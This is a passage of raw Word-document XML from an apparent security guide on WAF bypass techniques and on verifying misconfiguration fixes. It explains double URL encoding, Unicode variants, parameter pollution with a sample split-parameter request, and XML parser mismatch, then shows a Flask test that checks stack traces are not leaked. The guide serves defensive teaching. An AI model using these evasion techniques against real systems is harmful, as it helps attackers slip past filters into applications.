        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ). The WAF decodes it once to </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>%2f</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , flags it as safe, and forwards it to the application server. The web server then processes the second layer of decoding, translating it back to </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and exposing the local file path structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3D56CC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Non-Standard Unicode/Hex Variations:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attackers take advantage of how different application backends translate unique multi-byte characters. Using alternative Unicode representations of standard characters allows malicious strings to look innocuous to basic string-matching patterns while executing normally once parsed by the internal application engine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B37D02A"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HTTP Parameter Pollution (HPP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17399F12"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Attackers can split an exploit payload across multiple parameters of the identical name within a single request string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189837C7" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Vector:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consider an unhardened application console query: </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>GET /console? query=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>admin_command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . A WAF rule blocks any request containing </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>query=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>admin_command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A096A6" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>The Evasion:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The attacker structure looks like this: </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>GET /console? query=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>admin_&amp;query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>=command</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . Many WAFs will only parse and analyze the first occurrence of the variable ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>admin_</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ), clearing it as safe. However, when the downstream web application server receives the request, it merges the two identical parameter inputs into a single string ( </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>admin_command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ), processing the malicious configuration bypass entirely unhindered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C0317B"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Parser Impedance Mismatch (JSON/XML)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3936E0A0"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 xml:space="preserve">Modern headless APIs process structured data formats that legacy signature-based WAFs struggle to fully tokenize. An attacker exploiting an unhardened XML parser (CWE-611) can introduce whitespace padding, comments inside tags (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>ExternalEntity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ), or switch character sets (e.g., changing the HTTP header </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>UTF-16</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) to intentionally blind the WAF's string inspection engine while the underlying application parser reassembles and executes the payload cleanly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095422A9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Verification &amp; Compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC25A46" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. Fix Verification: Test Cases &amp; Regression Automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0E2810"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To confidently close a Security Misconfiguration ticket, security and QA teams must implement reproducible test cases that run continuously within the CI/CD pipeline. Relying on "manual checks" guarantees configuration drift over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C23D8BC"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Automated Unit &amp; Integration Test Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463E85DA" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Error-Handling Regression Tests:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Write integration tests that intentionally inject invalid types or boundary exceptions to API endpoints. The assertions must verify that the stack trace is completely suppressed and that the application </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>uniformally</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> answers with a generic payload structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A1E910" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49770818" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># Example Python/Flask Integration Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767E4F2A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>test_error_handling_does_not_leak_stackntraces</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(client):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B00547" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Pass an unexpected type to trigger an exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C75AED" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>client.post</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>('/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/v1/users', json={"age":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF7D950" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>invalid_string_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2258BA24" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    assert </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>response.status_code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E9B605" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Ensure raw system metrics or stack exceptions are completely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F8A778" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>absent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3D95A3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
